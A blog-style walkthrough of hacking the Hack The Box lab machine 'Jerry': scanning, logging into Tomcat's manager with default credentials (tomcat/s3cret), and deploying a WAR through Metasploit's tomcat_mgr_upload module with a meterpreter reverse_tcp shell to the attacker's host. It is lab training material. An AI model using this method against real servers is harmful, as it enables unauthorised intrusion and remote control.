In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.
In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.
We first scan the target machine in order to identify open ports and services running behind those ports.
The scan shows that port 8080 (HTTP) is open. Moreover, we learn that
Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.
Open your browser and go to
10.10.10.95:8080 . We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us getting access to the server. Let’s click on the link.
We are asked for login credentials. We click on
cancel and we are redirected to
10.10.10.95:8080/manager/html . Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to login with them.
It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.
Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the
multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload
java/meterpreter/reverse_tcp (a staged payload) this time.
set rhosts 10.10.10.95
set lhost <Your IPv4 address>
set rport 8080
set HttpUsername tomcat
set HttpPassword s3cret
Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!